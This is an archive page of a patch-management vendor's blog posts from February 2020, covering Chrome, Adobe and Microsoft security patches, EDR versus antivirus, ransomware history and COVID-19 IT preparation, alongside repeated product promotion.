Skip to main content
Monthly Archives

February 2020

||

Google Chrome Zero-Day Vulnerability Under Attack

By Patch Management

Google Chrome Zero-Day Vulnerability Under Attack

Google has patched a Chrome browser zero-day bug being actively exploited in the wild. The vulnerability affects installations of Chrome running on Windows, Linux, and macOS.

Chrome Under Active Attack

Google has patched a Chrome web browser zero-day bug being actively exploited in the wild. The vulnerability affects installations of Chrome running on Windows, Linux, and macOS.

The zero-day vulnerability, tracked as CVE-2020-6418, has been described as a type confusion issue affecting the V8 open source JavaScript engine used by the browser. Google has credited Clement Lecigne of its Threat Analysis Group for reporting the vulnerability. Lecigne has discovered various vulnerabilities within the past year within Chrome, as well as Internet Explorer.

Government Says Update Chrome

The Cybersecurity and Infrastructure Security Agency (CISA) also posted a bulletin encouraging users and administrators to review the Chrome Release and “apply the necessary updates.”

Technical details of the vulnerability are being withheld pending patch deployment to a majority of affected versions of the browser, according to Google. Memory corruption vulnerabilities typically occur when memory is altered without explicit data assignments triggering function errors, which in turn enable an attacker to execute arbitrary code on targeted devices.

Google Warns of More Vulnerabilities

Google has also warned users of two additional high-severity vulnerabilities. The first (CVE-2020-6407) is an out-of-bounds memory access in streams flaw and the other (CVE unassigned) is a flaw tied to an integer overflow in ICU, a flaw commonly associated with triggering a denial of service and possibly to code execution.

This is actually the third Chrome zero-day to have been exploited in the wild just this past year. Google patched the first Chrome zero-day in March of 2019 (CVE-2019-5786) and then a second in November of 2019 (CVE-2019-13720).

Patches for this zero-day have been released part of Chrome version 80.0.3987.122.

How to Manage Chrome Vulnerabilities

Leveraging a simple and powerful solution with an up-to-date library of third-party products could easily alleviate the issue across organizations. Syxsense provides Chrome updates same-day and allows for an exceptionally smooth process with a Patch Deploy task.

Simply target all devices for the newest update and the pre-packaged detection will determine if devices do/do not require the update. If they require it, the update will be automatically applied and the vulnerability remediated.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

5 Steps to Prepare Your IT Department for Coronavirus

By Blog

5 Steps Every IT Department Should Take to Prepare for Coronavirus (COVID-19)

Coronavirus is impacting businesses worldwide. Here are the steps every CIO and IT department should take to prepare their businesses.

Coronavirus is Here to Stay

According to major news outlets, Americans need to prepare for the imminent spread of Coronavirus. The U.S. Centers for Disease Control and Prevention (CDC) stated: “It’s not so much a question of if this will happen anymore, but more really a question of when it will happen — and how many people in this country will have severe illness,” according to Dr. Nancy Messonier, director of the CDC’s National Center for Immunization and Respiratory Diseases.

As seen in China, Coronavirus (COVID-19) is impacting businesses worldwide. We can expect a similar impact across the United States and Europe in the coming months.

How will Coronavirus change the way our business works?

We expect much greater use of remote meeting technologies like Zoom. This allows workers to avoid travel and decrease contact within the office, reducing close person-to-person contact in meeting rooms.

Additionally, we expect an increase in teleworking. Person-to-person infections can be greatly reduced by employees working from home. As seen in Asia, and now Europe, self-quarantine rules will likely be implemented. Teleworking will allow employees who are not sick to still be productive from home.

How Your IT Department Should Prepare

  1. Install office hand sanitizer stations. This simple step is one of the most effective methods to prevent transmission.
  2. Implement remote support tools. This allows your support team to remote control devices within your network to reduce or eliminate desk-side visits.
  3. Order hardware supplies. Desktops, laptops, servers, and spare parts should be ordered now. Most hardware is manufactured in Asia and supply chains are already being impacted. Organizations should be purchasing three months of equipment needs.
  4. Prepare for teleworking. What hardware, software and other tools are required for teleworking?
  5. Select the right tool. Does your IT management tool support teleworking? Can you manage devices outside the corporate network? Can devices at home access the corporate data you will need? Will you ensure large numbers of highly distributed devices are patched and secured without them coming into the office?

Start your organization’s journey toward simple and powerful endpoint security with a free trial of our products and services.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
|||||||

Is There a Patching Alternative to WSUS?

By Patch Management

Is There a Patching Alternative to WSUS?

Still using WSUS for patch management? There might be a better strategy for efficiently protecting and managing your business.

Still Using WSUS?

Tired of scouring through forums to figure out why WSUS isn’t installing updates? Do you keep getting errors even though you followed every step perfectly?

While WSUS is a free update tool, it is extremely limited. There is no way to track the status of your tasks, report on work done, or deploy non-Microsoft updates.

Why You Should Pay for an IT Management Solution

While WSUS might come with Windows, it is certainly not free. There are hidden expenses to consider. Looking at the number of hours wasted, and additional software needed to fully manage your environment, WSUS comes out as more expensive than any paid-for IT management software.

Spending so many resources on only updating your Windows OS is a dramatic waste of the time your IT team could spend on more critical or interesting projects.

Implementing a solution, such as Syxsense, will simplify your deployment process. From a single browser Syxsense can manage PCsMacs, and Linux devices, as well as devices inside and outside the network. You can also deploy third-party software, track task status, generate reports, and more. You can patch everything, everywhere, all from the cloud.

The Syxsense Advantage

Syxsense allows you to:

  • See your full inventory and vulnerability status
  • Prioritize and deploy patches based upon severity
  • Start patching endpoints within minutes

Syxsense Manage and Syxsense Secure can easily resolve vulnerabilities across your entire environment. Find peace of mind by trusting your Syxsense and set up a free trial today.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
|||

Why You Should Combine Your IT Management and Security Operations Strategy

By Patch Management

Why You Should Combine Your IT Management and Security Operations Strategy

The current IT security landscape is changing dramatically. How will the shift to endpoint detection and response (EDR) change your strategy?

How IT Security is Changing

Companies initially put up firewalls and installed antivirus software to prevent security breaches. But it wasn’t long before ransomware came along and shattered the status quo, shifting the focus to endpoint detection and response (EDR).

With that, the market for endpoint-security software exploded.

However, organizations are forced to cobble together a variety of barely compatible vendors to meet all of their cybersecurity needs. Multiple solutions with their own infrastructure, deployment processes, training, and ongoing management. With skyrocketing costs, one thing became crystal clear: Companies are searching for an option that combines systems management tools, EDR, and vulnerability/threat management in a single, seamless platform.

Being in the vanguard of systems and patch management, Syxsense is the first to combine endpoint management and security that provides greater efficiency between IT management and security teams. In today’s rapidly changing digital landscape, Syxsense is at the forefront of a security revolution.

With AI-driven threat protection, Syxsense enables customers to have a “sixth sense” for security vulnerabilities and breaches. That is the power of complete endpoint visibility and predictive technology.

The Current Security Landscape

A recent article by Enterprise Strategy Group (ESG) confirms this scenario: “ESG research shows that 77% of companies surveyed plan to move to an integrated security suite with a preference towards a single vendor, with an even split between companies who are looking to next-gen providers and those looking to the large, established security players.”

While security vendors continue to increase the efficacy of their preventative solutions, security users are demanding simplification in the security stack, wanting to work with fewer tools and vendors. ESG concluded that “this means that organizations will need to depend on today’s tools providers to bring together at least the core prevention, detection, and response capabilities, in addition to managed services to assist in the implementation and management of these functions.”

The Syxsense Advantage

Our strategy is to simplify technology, which includes the consolidation of siloed endpoint security tools into a single agent for centralized security functions; merging of endpoint protection platforms (EPP) and EDR; and combining pre-execution prevention, post-execution detection, and response/remediation.

Syxsense believes the time is right to include endpoint management in the EPP/EDR mix. This creates an opportunity for consolidated technology that unifies the essential pieces across all three functions for greater efficiency, collaboration, and reduced costs—especially for SMB and mid-market enterprises.

Cyber criminals never stop working, and neither does Syxsense. We will help you secure your network from criminals who never give up on finding new ways to steal your company’s data and cripple your business. That’s why we’ve created an end-to-end solution that combats security threats, start to finish. Built for businesses that have limited resources but still need innovative security technology, Syxsense has brought together all of the essential components required to secure your enterprise quickly and easily—today.

Until now, what this all meant to the IT and security teams looking to stay on top of things was chaos in the market for security software.

Simplifying Endpoint Security

Syxsense has done everything it can to end this chaos and simplify endpoint security in the 2020s. New endpoint types, such as Internet of Things (IoT), workforce trends such as Bring Your Own Device (BYOD), and operating system and software vulnerabilities that require countless patches across increasingly complex networks, make endpoint management a real slog.

Endpoint management challenges increase the risk for exposure to threats. If businesses fail at endpoint management, they will fall victim to a security breach that could have been avoided.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Adobe Patches Released for New Critical Flaws

By Patch Management

Adobe Patches Released for New Critical Flaws

Adobe has released dozens of critical patches this week, addressing 42 separate CVEs in its regularly scheduled February updates.

Adobe Puts Out Dozens of Patches

Adobe has released dozens of patches this week, addressing 42 separate CVEs in its regularly scheduled February updates, with 35 of the flaws rated as Critical severity.

The full release includes a total of five of Adobe’s widely-used software:

  • Adobe Acrobat and Reader
  • Adobe Digital Edition
  • Adobe Experience Manager
  • Adobe Flash Player
  • Adobe Framemaker

“This update addresses multiple critical vulnerabilities,” Adobe stated in its security bulletin. “Successful exploitation could lead to arbitrary code execution in the context of the current user.”

Fixing Framemaker

The majority of the fixes (21) impact Adobe Framemaker, a document processor designed for writing and editing large or complex documents, according to a security advisory published on Tuesday.

The Framemaker flaws include buffer errors, heap overflow problems, out-of-bounds write, and memory corruption issues; any of which can lead to the execution of arbitrary code. Adobe Framemaker versions 2019.0.4 and below (for Windows) are affected and thus a patch has been published for version 2019.0.5.

Exploring the Vulnerabilities

Adobe Acrobat and Reader for Windows and macOS also contain 12 similar code execution vulnerabilities. These vulnerabilities include heap overflow, buffer errors, use-after-free flaws, and privilege escalation bugs.

Just like with Framemaker bugs, if exploited, these can lead to arbitrary code execution and file system writes. Adobe also remediated 3 important out-of-bounds read issues leading to information disclosure and 2 moderate stack exhaustion vulnerabilities that could be easily exploited to cause memory leaks.

The latest update for Adobe Flash Player, potentially one of the most infamous applications in terms of having a horrible security record, has a critical arbitrary code execution flaw. If exploited, the flaw could allow hackers to compromise targeted Windows, macOS, Linux, and Chrome OS-based devices.

Adobe’s Digital Edition, an eBook reader application, also has a critical and an important flaw in versions 4.5.10 and below. The critical flaw stems from a command-injection glitch (CVE-2020-3760) allowing potential arbitrary code execution. Command-injection attacks are possible when an application passes unsafe user supplied data (such as forms or HTTP headers) to a system shell.

Last, but possibly least, Adobe Experience Manager, Adobe’s content management solution, has an important-level uncontrolled resource consumption vulnerability (CVE-2020-3741) that could result in a denial-of-service condition.

Patching the Problems

Though none of the software vulnerabilities resolved this month were publicly disclosed or appear to have been exploited in the wild, all of the products mentioned above should be patched as soon as possible.

For a “one-stop-shop” with vulnerability scanning, patch management and endpoint detection and response in one package, look no further than Syxsense Secure. Available as a standalone software product or alongside 24/7 managed services from our dedicated, experienced team.

The similarly comprehensive Syxsense Manage solution offers additional endpoint, OS and patch management, oversight to complete the picture of meticulous and wide-ranging threat management.

Begin your organization’s journey toward airtight endpoint security with a free trial of Syxsense’s products and services.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Microsoft’s February 2020 Patch Tuesday Fixes 99 Security Issues

By Patch Management, Patch Tuesday

Microsoft’s February 2020 Patch Tuesday Fixes 99 Security Issues

The official Patch Tuesday updates have arrived for February, including 99 vulnerability fixes. Catch up on the latest news from Microsoft and start patching.

February Patch Tuesday is Here

Microsoft have released 99 patches today. There are 12 Critical patches with the remaining marked Important.

Support for Windows 7 and Windows Server 2008 (including R2) was officially ended last month, but there are plenty of updates released this month for customers who have purchased an extension agreement.

Zero Day Weaponized Bug for IE

CVE-2020-0674, which carries a Critical vendor severity and High CVSS score, has been documented as being Publicly Aware and actively Weaponized.

This is as close to a Zero Day as you can get, and we encourage all users still using Internet Explorer to update this as soon as possible. This vulnerability affects Windows 7, which officially ended support last month, and Windows 10 through Windows Server 2008 to 2012.

Robert Brown, Director of Services for Syxsense said, “If you are still using Internet Explorer on Windows 7 and have not purchased the CSA / ESU extension, you may wish to consider uninstalling IE and replacing it with another browser immediately due to the critical nature of this vulnerability. It has huge potential to be used to install Ransomware or other software simply by accessing an infected website. Customers using Syxsense Manage or Syxsense Secure will be able to deploy all new Windows 7 content to your licensed Windows 7 systems.”

Microsoft released a security advisory for an unpatched IE code-execution vulnerability.

Another Adobe Headache

Adobe released 42 updates today—the largest of the year so far. They have fixed bugs in Framemaker, Experience Manager, Adobe Digital Editions, Flash, and Acrobat and Reader. Both Syxsense and Adobe recommend these Critical updates be deployed within the next 7 days.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo

I am text block. Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.

|||

Endpoint Security vs. Antivirus

By Patch Management

Antivirus Software is Nice, But It’s Not Enough for Full Endpoint Security

Are your current security measures enough to protect your network’s endpoints? Explore the key differences between antivirus software and EDR tools.

As we previously pointed out in our “Endpoint Security 2020: What Your Need to Know” article: “Cyberattacks are growing more complex and difficult to prevent, and this will only accelerate in the future, thus making endpoint security a top goal in 2020.” Given the news of late, there can be no doubting the importance of this..

You probably already have information-security measures in place in your organization, such as firewalls and antivirus software. But you might be wondering if what you have in place is sufficient to properly protect all of your network’s endpoints.

Unfortunately, the question—and answers—might not be that simple. As pointed out by SolutionsReview, it’s important to understand the historical significance of antivirus software. Such tools—the origins of which date back more than 30 years—represent the wellspring from which other, more sophisticated, cybersecurity tools and techniques would emerges.

The late 1980s and early 1990s marked the debut of antivirus products from developers such as Symantec, McAfee and Sophos, in addition to the founding of cybersecurity research groups such as the Computer Antivirus Research Organization.

Now, three decades later, antivirus tools are part of standard operating procedure for virtually all professional-grade desktops and laptops—as well as a considerable number of the smartphones and tablets used by enterprise staff. Plenty of consumers also use such applications.

The Inherent Limits of Antivirus Control

In the majority cases, antivirus software exists in the background, only showing its presence when a threat is detected. While certainly valuable, there is a clear limitation to antivirus software: it only functions as a defensive measure when an active threat has made itself known. It does not have much in the way of counteroffensive tools, nor does it have the broader scope of functionality available through endpoint detection and response (EDR) tools.

Additionally, many legacy antivirus programs—and even some of the more recent versions—are all too often limited to detecting the presence of signature-based cyberthreats. While a significant number of the well-known malware and exploit tools used by modern hackers have signatures embedded in their code that an up-to-date antivirus platform can identify, there are also plenty that haven’t had their signatures cataloged yet. Malware that lacks signatures altogether is also becoming increasingly common, according to TechTarget.

Perhaps most alarming of all is that many cyberattacks today eschew files entirely. Instead, they use innocuous-looking links to trigger garden-variety programs such as Flash and Windows PowerShell, the latter of which can be compromised through remote manipulation of the command line with relative ease.

As CSO explained, these collect data from the victimized machine and relay it to the hacker who originated the attack, allowing that interloper to seize further control of a device and subsequently deliver more exploits. An entire network could be devastated this way, and many antivirus tools would most likely have never seen it coming.

The Ponemon Institute’s 2018 State of Endpoint Security Report noted that 35% of that year’s malware attacks were fileless, while projecting that figure to increase to 38% for 2019. In the years to come, it’s entirely possible that fileless exploits will constitute a significant majority of the cyberattacks deployed against all businesses and public-sector organizations, leaving antivirus tools even more in the lurch.

Moving Ahead to Endpoint Protection

Back in 2015, in a guest blog post for Politico, engineer and futurist David Evans estimated that about 127 new endpoints were being added to the internet of things every second, all over the world. More recently, Gartner projected that IoT growth had reached the point at which there would be approximately 5.8 billion endpoints in the global enterprise and automotive markets alone by the end of 2020, marking 21% growth from the previous year.

According to the SANS study “Understanding the (True) Cost of Endpoint Management,” 61% of the respondents said their organizations had more than 1,000 user endpoints, while 5% claimed to have 100,000 or more. And the risk to small businesses is no less real and significant than that facing medium-sized and enterprise-level companies. Per Verizon’s Mobile Security Index 2019, 88% of firms with 500 or fewer workers acknowledged that endpoint security was a serious hazard to their operations, and that it will only get worse.

EDR to the Rescue

EDR solutions emerged as a means of addressing the security issues created by increase in endpoints, IoT-relate or not. They are deployed according to the software-as-a-service model. Rather than continuously scanning the network and its various interconnected viruses for clear signatures of malware, EDR tools monitor user behaviors, looking for actions and operations that are out of the ordinary. This is sometimes referred to as “suspicious activity validation.”

The best EDR tools perform all of the classic functions of their cybersecurity predecessors, but leverage new methods to do so, including the use of artificial intelligence and machine learning. Furthermore, they are not limited to checking for conventional signatures to look for signs of potential malware intrusions; they also examine URLs, IP addresses, file hashes, and other data points.

How EDR from Syxsense Keeps you Protected

Cyber-attackers are not exactly the kind of folks who will limit their intrusions to business hours. Whatever they are up to—from monetary gain to state-sponsored intrusion—bad actors are always on the lookout for weak spots to take advantage of. IoT endpoints are among their favorites. Your organization deserves an EDR solution that is as constantly active—and aggressive—as cybercriminals are.

Syxsense Secure and Manage both provide enterprise users with the sort of always-on protection that is necessary to mitigate the broad spectrum of cybersecurity threats out there today. By allowing for comprehensive and real-time visibility into all endpoint activity, reporting on device inventory, quickly quarantining detected threats, and automatically patching all of your devices—be they Windows, Mac, or Linux—Syxsense solutions represent an efficient and meticulous approach to information-security needs.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
||

Why Endpoint Detection and Response is Getting Harder in 2020

By Patch Management

Why Endpoint Detection and Response is Getting Harder in 2020

As the severity of cyberthreats increases, the demand for endpoint detection and response solutions across the globe is growing.

The demand for endpoint detection and response solutions across the globe is currently quite strong, with no signs of slowdown any time soon: Recent research by London-based firm Technavio predicts that the market for this type of cybersecurity software will grow by $7.67 billion between 2020 and 2024, representing a compound annual growth rate of 10%.

Why such robust growth in this space? The answer is both simple and unfortunately discomforting. It’s becoming more difficult for businesses, government departments and other organizations to feel secure with the endpoint protections they have in place.

No wonder, given that the severity (and sheer number) of cyberthreats out there is constantly growing. Today, we’ll take a look at what challenges organizations aiming to bolster the effectiveness of their information security may face — and how they might be able to overcome such hurdles.

More Devices = More Potential Weaknesses

Analysis from the researchers at Gartner projected in August 2019 that there would be 5.8 billion open endpoints to the internet of things around the world by the end of the following year: a 21% uptick from 2019’s number.

There’s no denying the utility and communicability that the IoT fosters for so many, but while marveling at those positive attributes you must also note the risks it poses. As the number of endpoints increases across your network — both inside and outside of the IoT realm — so do the potential points of weakness.

In fact, Infosecurity magazine reported in October 2019 that there had been more than 100 million attacks on IoT-connected devices in the first half of that year. Applications run on such devices can be particularly vulnerable.

According to TechRadar, facing up to the security threat represented by IoT device proliferation requires use of an endpoint security solution that can offer comprehensive visibility of all internal and external vulnerabilities. This vigilance must be constant and in real time.

Mounting Danger of New and Established Cyberthreats

IoT-focused cyberattacks, while relatively new in the cyberthreat landscape, have already done plenty of damage, with Wired citing the Mirai and Reaper botnet attacks of 2016 and 2017, respectively, as major examples of such malicious campaigns. The latter of those infected more than 1 million networks. The new versions of the threats coming through IoT endpoints will have the ability to be even more devastating, manifesting as complex dedicated denial of service attacks.

Other attack styles that are even more well-established, like phishing, are becoming even more dangerous in similar ways, according to Security Boulevard. Malicious actors have diversified and variegated the former’s capabilities so that these social engineering scams are no longer confined to emails that are relatively easy to detect: They can be deployed via text messages and even phone calls. AI plays a significant role here, as hackers are using it to mimic an organization’s in-house jargon and speech and thus make phishing expeditions harder to discover.

Last but not least, ransomware looks to pose a more grave threat than ever before. The extortionists using this malware saw plenty of success in 2019, attacking local governments all over the U.S., including Atlanta, Baltimore and New Orleans.

In one particularly brazen, widespread attack, hackers simultaneously hit the municipal networks of 22 Texas cities and towns, disabling countless web-based civic services and operations.

Although not all of those attacks netted hackers the ransom sums they demanded, the disturbing effectiveness of such efforts has likely emboldened cyber attackers, so bigger and more devastating ransomware campaigns are surely on the horizon for 2020. The same is almost certainly true for IoT-based and social engineering attacks. Only the strongest, most versatile threat detection and solutions will be capable of meeting major cyberthreats head-on, be they new attack types or updated versions of old standbys.

The Need for Quicker Responses to Threats

Opinions vary on how long it takes cyber attackers to breach a target that they’ve picked to bear the brunt of their hacks. Some say it falls between 15 and 10 hours, while others consider it more a matter of minutes, according to TechTarget. Either way, that’s an effectively minuscule time frame.

In an interview with Dark Reading, Dan Basile, executive director of security operations at Texas A&M University, noted that it while it’s ideal to find cyberthreats before they can do any harm — like removing a tumor before cancer metastasizes uncontrollably — this perfect-world plan of action isn’t always possible. Therefore the focus switches to quickly directing infosec defenses at a detected threat before permanent damage occurs. EDR needs to be a part of a quick-response strategy, along with application firewalls, network traffic analysis and other systems.

EDR Can’t Do It Alone

That last sentence in the section above represents another key point: EDR is (and will continue to be) more difficult if you expect it to carry the weight of all infosec responsibilities on its own. It must be deployed in concert with firewalls, encryption, multi-factor authentication, threat hunting and other tools. The support of an organizational culture aware of and focused on the gravity of contemporary cybersecurity threats is also essential.

Choosing Syxsense as your EDR solution gives businesses a considerable head start on their journey to crafting a reliably secure environment for your digital assets. Coupled with our comprehensive managed IT and patch management services, Syxsense can provide your organization the peace of mind it deserves. Contact us today to learn more or sign up for a free trial.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo
|||||

How Deadly is Ransomware?

By Patch Management

How Deadly is Ransomware and How Effective are the Protections Against It?

Organizations of all kinds have found themselves victims to ransomware. Find out how dangerous these attacks are and explore strategies to protect your business.

Picture the following scenario for a moment: It’s a seemingly typical day at the office for your business. People are busy and coffee-driven. Everything is unfolding as it should — or at least as it usually does.

Then, in the space of just a few seconds, everything changes on a dime with the beginning of a ransomware attack.

Maybe it’s your client database — including all of the financial and personal information you’ve collected in the partnership process — that suddenly becomes inaccessible. Perhaps key files are abruptly encrypted in a way that you’ve never seen before. Or maybe systems grind to a halt and won’t function. You see a message telling you, in so many words, to pay up or lose the data (or remain locked out of your mission-critical networks and devices). It’s a simple — and often successful — exploit tactic.

No matter how the incident specifically unfolds, whether you pay up or work around it, you’ll likely always divide your job, to some extent, into pre- and post-ransomware periods. Here, we’re going to take a deep dive into the ins and outs of ransomware, and examine how effective various tools — ranging from staff training to endpoint detection and response solutions — can be in mitigating the damage that this increasingly common cyberattack type can do.

A Brief History of Ransomware

According to a 2012 piece from TechRepublic, ransomware dates back to the late 1980s, though it did not emerge as a tool during that decade. It became somewhat prominent among hackers and cyberattackers in the mid-2000s, and about a decade after that, it began to take the forms that IT and information security team members are familiar with today.

To date, the most famous ransomware attack — and certainly the most impactful in terms of the sheer number of those who were victimized by it — is 2017’s WannaCry. This particular act of extortion involved a viral exploit known as ExternalBlue, which attacked Microsoft operating systems that hadn’t been patched for a vulnerability in the Server Message Block file-sharing protocol.

Gizmodo noted that the attack, based on a self-propagating cyber warfare tool originally developed by the National Security Agency and hijacked by the ShadowBrokers hacker group, spread quickly to every device on every network it reached and randomly through the internet.

WannaCry-infected machines saw their data encrypted and received demands for $300 ransom payments into bitcoin wallets in exchange for decryption. Since the ransomware spread to as many as 200,000 computers across 150 countries before white-hat hackers began distributing decryption keys, its makers received almost $130,000 for their efforts.

Also, although the Department of Justice would ultimately charge a North Korean hacker, Park Jin-hyok, with deployment of WannaCry and various other cyberattacks, The New York Times pointed out Park would likely never stand trial for these alleged offenses due to poor U.S.-North Korean diplomatic relations.

Anatomy of a Typical Ransomware Attack

Social engineering strategies like phishing or spear-phishing are perhaps the most common delivery system for ransomware attacks, especially in organizational networks:

  • An employee receives an email purporting to be from a manager or co-worker, urging them to click on a link or attachment.
  • When they do, malware takes over targeted systems, either encrypting files or preventing access.
  • A ransom-demand message is then delivered, sometimes with a deadline. Bitcoin wallets are the typical method of payment requested by attackers, due to their use of decentralized ledgers that can be easily found but whose owners are virtually untraceable.

Existing vulnerabilities, like the Windows flaw that allowed WannaCry just enough room to sneak into so many machines, are another common entry point for ransomware scams. Intrusion through the internet of things is also entirely feasible, especially, as CSO noted, in the case of botnets that have seized control of dozens of devices.

Botnets can — and have — shut down large portions of the global internet due to their raw power, making them perhaps the most frightening ransomware threat vector. (That said, the average ransomware attack is more precisely targeted than the blitzkrieg approach of a large botnet would allow.)

Organizations of all kinds across the public and private sectors have found themselves the victims of ransomware. But throughout the late-2010s heyday of this cyberattack type, state and local government offices were targeted with particular frequency. In many cases, this was due to under-protected or outdated IT infrastructure that was easier to breach.

Due to the sensitivity (and volume) of information these bodies hold in their records, they will most likely remain common ransomware victims for the foreseeable future. On the private-sector side of things, energy sector firms and healthcare organizations — especially the latter — have often been similarly attacked and will continue to be targeted in 2020 and the years to come.

As stated, ransomware usually works by encrypting or walling off data, or bringing an infected machine (or network) to a halt through a dedicated denial of service. However, in some recent cases, cyberattackers have used the exploits in their ransomware deployments to steal data from businesses and leak it — or threaten to do so — to add further heft to their monetary demands, according to ZDNet. Organizations must be prepared for all of the worst-case scenarios that can accompany a ransomware attack.

The Personal Side of Ransomware Mitigation & Response

Most people are at least somewhat aware of ransomware by now. But that doesn’t necessarily mean the average employee of a given organization is trained to be cyberattack-wary in a manner that genuinely minimizes their likelihood of being hit with such an attack or provides them the skills to deal with it.

According to the results of the Chubb 2019 Cyber Risk Survey, only 31% of organizations offer company-wide training to bolster staff awareness of cyberthreats. Because of this, it’s hard to fault workers for falling prey to well-disguised ransomware scans.

The Infosec Institute pointed out that regular cybersecurity awareness training, once implemented, can be a significant aid to organizations’ efforts to reduce their overall levels of vulnerability to ransomware and other potentially devastating attacks. Experts noted that it can be particularly effective to engage employees in such training exercises on a monthly basis.

Framing these initiatives through the lens of gamification -— e.g., conducting simulated social engineering and ransomware attacks and offering prizes to those who respond to the mock threats properly — can further galvanize workers’ enthusiasm for and commitment to cybersecurity. This can lead to a significant decrease in staff members falling prey to the phishing, pretexting and other social engineering scams that often precede ransomware infection.

Choosing the Proper Tools

Training and increased awareness alone will not be sufficient to substantially mitigate the dangers that ransomware poses to countless organizations. It’ll also be necessary to find and implement a number of more concrete tools equipped to detect and repel or quarantine these cyberattacks.

If you already have an antivirus software solution in place, there’s a strong chance that it won’t be equipped to deal with contemporary ransomware threats unless the program is brand new. And most of the antivirus software that does work on ransomware is specifically focused on detecting and preventing it as opposed to other attack vectors.

Also, often as not, businesses that haven’t been previously targeted by cyberattacks of any kind will have let their cybersecurity measures fall out of date- and such lax awareness, on its own, can be enough to facilitate a ransomware intrusion, as the WannaCry debacle proved.

Instead, it may be best for your organization to use a multifaceted approach that includes not only employee training, firewalls and antivirus tools but also solutions for patch management and endpoint detection and response. As businesses integrate themselves further into the IoT landscape, their endpoint numbers will skyrocket, presenting that many more potential entry points for attackers, so it’s critical to protect them at all costs.

Syxsense offers comprehensive EDR software and patch management platforms along with always-available managed services from our support team. To dive deeper into the possibilities of our products, consider a free trial today.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo